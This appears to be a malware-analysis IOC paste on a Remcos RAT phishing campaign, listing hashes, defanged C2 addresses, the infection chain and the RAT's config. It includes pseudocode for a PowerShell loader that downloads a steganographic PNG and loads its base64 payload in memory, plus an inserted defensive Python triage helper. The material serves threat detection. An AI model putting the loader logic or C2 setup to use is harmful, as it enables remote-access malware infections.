- #IOC #OptiData #VR #remcos #RAT #stego #pngbase64 #RegAsm #PowerShell
- https://pastebin.com/EvXHfZUB
- previous_contact:
- 18/01/24 https://pastebin.com/FL2fX362
- 25/12/23 https://pastebin.com/D535PVm3
- 21/12/23 https://pastebin.com/samYnJq6
- 30/11/23 https://pastebin.com/aG6XyqHN
- 13/11/23 https://pastebin.com/tbRpiGG5
- 06/02/23 https://pastebin.com/kjv5E8Au
- FAQ:
- https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
- attack_vector
- --------------
- email attach .docx (T1221) > get .doc (11882) > get .vbs > get base64 > get .png (stego) > get .txt > decode > inject RegAsm.exe > C2
- # # # # # # # #
- email_headers
- # # # # # # # #
- Date: 18 Jan 2024 22:57:35 -0800
- From: Velislav Deshev<info@cifogge.ooguy.com>
- Subject: RE: Потвърждение за плащане на фактура
- Received: from unknown (HELO mail0.cifogge.ooguy.com) ([79_141_163_23])
- Message-ID: <20240118225734.55E14297A16A5D59@cifogge.ooguy.com>
- # # # # # # # #
- files
- # # # # # # # #
- SHA-256 fb4bc1cb8305aee8f54e592dd5fb22d4d84838d371d65521e103306ad929c9cd
- File name swift 19-1-2024.docx [ Microsoft Word 2007+ ] !Template Injection
- File size 30.64 KB (31376 bytes)
- SHA-256 f745310bf10c1bc657b89f10f740c372bdf0cabed4b0f4f93782a6762fc6a38c
- File name microsoftdecidedtoup....doc [ Rich Text Format ] !11882 EQUATION
- File size 57.77 KB (59160 bytes)
- SHA-256 5f7a77697b2eb9acc01489265be5c49dbba8aa1ea12f28930103abe205db7baa
- File name AItechnology.vbs [ JavaScript ] !Detect sandbox
- File size 13.94 KB (14272 bytes)
- SHA-256 e9be870a568580ab6b5d0998e0170a230ddc2eb06698307f1bb9ced590ca14a4
- File name UE4Lk [ JavaScript ] !Base64 2 PowerShell
- File size 46.70 KB (47816 bytes)
- SHA-256 f6dc3dc76e0d6e8d2035112c83a31aebbcc91656ec4202ffda6e08f591acd991
- File name uwp4228677.png [ PNG image data ] !Stego Loader BASE64_START
- File size 17.73 MB (18594320 bytes)
- SHA-256 e0bdc21402c6a619102441d22b88b5e575fec496e24e6103b62132e77ef31042
- File name GRM.txt [ Reverse Base64 ] !REMCOS encoded payload
- File size 644.00 KB (659456 bytes)
- # # # # # # # #
- activity
- # # # # # # # #
- PL_SCR wallpapercave_com / uwp / uwp4228677.png (LOADER)
- 172_232_189_7 / 5060 / GRM.txt (REMCOS)
- C2 top_noforabusers1_xyz 147_124_215_172 : 2424
- netwrk
- --------------
- 104_21_64_92 dik_si 80 HTTP HEAD /wOBjE HTTP/1.1 Microsoft Office Existence Discovery
- 172_232_189_7 172_232_189_7 80 HTTP GET /ait/microsoftdecidedtoupdateentireprocessfromtheserviceofmsofficetoinbuildtechnologytoimplementtheprocess.doc ms-office;
- 172_232_189_7 172_232_189_7 80 HTTP GET /5060/AItechnology.vbs HTTP/1.1 Mozilla/4.0
- 188_114_97_9 paste_ee 80 HTTP GET /d/UE4Lk HTTP/1.1 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- 188_114_97_9 paste_ee 443 TLSv1 Client Hello
- 104_22_53_71 wallpapercave_com 443 TLSv1.2 Client Hello
- 172_232_189_7 172_232_189_7 80 HTTP GET /5060/GRM.txt HTTP/1.1
- 147_124_215_172 2424 TLSv1.3 Client Hello
- comp
- --------------
- WINWORD.EXE TCP 104_21_64_92 80 ESTABLISHED
- WINWORD.EXE TCP 172_232_189_7 80 ESTABLISHED
- EQNEDT32.EXE TCP 172_232_189_7 80 ESTABLISHED
- WScript.exe TCP 188_114_97_9 443 ESTABLISHED
- powershell.exe TCP 104_22_53_71 443 ESTABLISHED
- powershell.exe TCP 172_232_189_7 80 CLOSE_WAIT
- RegAsm.exe TCP 147_124_215_172 2424 ESTABLISHED
- proc
- --------------
- C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE
- "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
- "C:\Windows\System32\WScript.exe" "C:\Users\operator\AppData\Roaming\AItechnology.vbs"
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = . . .
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . . . ('172_232_189_7 / 5060 / GRM.txt' , 'C:\ProgramData\', 'LnkName','RegAsm')
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Copy-Item -Destination C:\ProgramData\Regasm.vbs
- C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 19.01.2024 14:09
- Path File not found: C:\ProgramData\Regasm.vbs.exe
- drop
- --------------
- %temp%\Temporary Internet Files\Content.IE5\*\AItechnology[1].vbs
- C:\Users\operator\AppData\Roaming\AItechnology[1].vbs
- # # # # # # # #
- additional info
- # # # # # # # #
- powershell load remcos:
- --------------
- image_Url = 'wallpapercave_com / uwp / uwp4228677.png'
- web_Client = System.Net.WebClient
- image_Bytes = DownloadData(image_Url)
- image_Text = UTF8.GetString(image_Bytes)
- start_Flag = <<BASE64_START>>; endFlag = <<BASE64_END>>
- base64_Command = image_Text_Substring
- command_Bytes = Convert ::From_Base64String
- loaded_Assembly = [System_Reflection.Assembly] :: Load (command_Bytes)
- type = loaded_Assembly_GetType (Aspose.DrawingSpec.PkikAttrCertNB)
- method = Run . Invoke 172_232_189_7 / 5060 / GRM.txt desativado Regasm C:\ProgramData\ LnkName RegAsm
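A triage helper for the stego loader sketched above, added here as an example (not the author's notes and not the malware's code): it locates the <<BASE64_START>> / <<BASE64_END>> markers in a downloaded image, decodes the blob and reports PE magic, size and SHA-256 without ever loading it, and also decodes the "Reverse Base64" scheme the paste notes for GRM.txt. The sample PNG and reversed text are constructed.

```python
import base64
import binascii
import hashlib
import re
from typing import Optional

# Markers the loader described above searches for in the downloaded image text.
START_MARK = b"<<BASE64_START>>"
END_MARK = b"<<BASE64_END>>"

def extract_marked_base64(blob: bytes) -> Optional[bytes]:
    """Return the bytes between the start and end markers, or None if either is absent."""
    start = blob.find(START_MARK)
    if start == -1:
        return None
    start += len(START_MARK)
    end = blob.find(END_MARK, start)
    return None if end == -1 else blob[start:end]

def decode_payload(b64: bytes, reversed_text: bool = False) -> Optional[bytes]:
    """Strict base64 decode; reversed_text=True handles the 'Reverse Base64' GRM.txt scheme."""
    text = b64[::-1] if reversed_text else b64
    text = re.sub(rb"\s+", b"", text)  # stego tooling often wraps the blob across lines
    try:
        return base64.b64decode(text, validate=True)
    except (binascii.Error, ValueError):
        return None

def triage(blob: bytes, reversed_text: bool = False) -> dict:
    """Summarise the hidden payload without loading it: PE magic, size, sha256."""
    b64 = extract_marked_base64(blob)
    if b64 is None:
        return {"found": False}
    payload = decode_payload(b64, reversed_text)
    if payload is None:
        return {"found": True, "decoded": False}
    return {"found": True, "decoded": True, "is_pe": payload[:2] == b"MZ",
            "size": len(payload), "sha256": hashlib.sha256(payload).hexdigest()}

# Constructed sample (not the real uwp4228677.png): PNG signature, filler, then a
# fake MZ-headed blob wrapped in the markers, the layout the loader expects.
FAKE_PE = b"MZ" + b"\x00" * 62 + b"constructed placeholder, not a real executable"
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32 + START_MARK + base64.b64encode(FAKE_PE) + END_MARK
# Constructed stand-in for GRM.txt: base64 text written back to front.
SAMPLE_REVERSED = base64.b64encode(b"constructed reversed payload")[::-1]

if __name__ == "__main__":
    print(triage(SAMPLE_PNG))
    print(decode_payload(SAMPLE_REVERSED, reversed_text=True))
```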
- remcos config
- --------------
- {
- "Version": "4.9.3 Pro",
- "Host:Port:Password": "top_noforabusers1_xyz : 2424 : 1",
- "Assigned name": "RemoteHost",
- "Connect interval": "1",
- "Install flag": "Disable",
- "Setup HKCU\\Run": "Enable",
- "Setup HKLM\\Run": "Enable",
- "Install path": "Application path",
- "Copy file": "remcos.exe",
- "Startup value": "Disable",
- "Hide file": "Disable",
- "Mutex": "Rmc-M4OLK2",
- "Keylog flag": "0",
- "Keylog path": "Application path",
- "Keylog file": "logs.dat",
- "Keylog crypt": "Disable",
- "Hide keylog file": "Disable",
- "Screenshot flag": "Disable",
- "Screenshot time": "10",
- "Take Screenshot option": "Disable",
- "Take screenshot title": "",
- "Take screenshot time": "5",
- "Screenshot path": "AppData",
- "Screenshot file": "Screenshots",
- "Screenshot crypt": "Disable",
- "Mouse option": "Disable",
- "Delete file": "Disable",
- "Audio record time": "5"
- }
- # # # # # # # #
- VT & Intezer
- # # # # # # # #
- https://www.virustotal.com/gui/file/fb4bc1cb8305aee8f54e592dd5fb22d4d84838d371d65521e103306ad929c9cd/details
- https://www.virustotal.com/gui/file/f745310bf10c1bc657b89f10f740c372bdf0cabed4b0f4f93782a6762fc6a38c/details
- https://www.virustotal.com/gui/file/5f7a77697b2eb9acc01489265be5c49dbba8aa1ea12f28930103abe205db7baa/details
- https://www.virustotal.com/gui/file/e9be870a568580ab6b5d0998e0170a230ddc2eb06698307f1bb9ced590ca14a4/details
- https://www.virustotal.com/gui/file/f6dc3dc76e0d6e8d2035112c83a31aebbcc91656ec4202ffda6e08f591acd991/details
- https://www.virustotal.com/gui/file/e0bdc21402c6a619102441d22b88b5e575fec496e24e6103b62132e77ef31042/details
- VR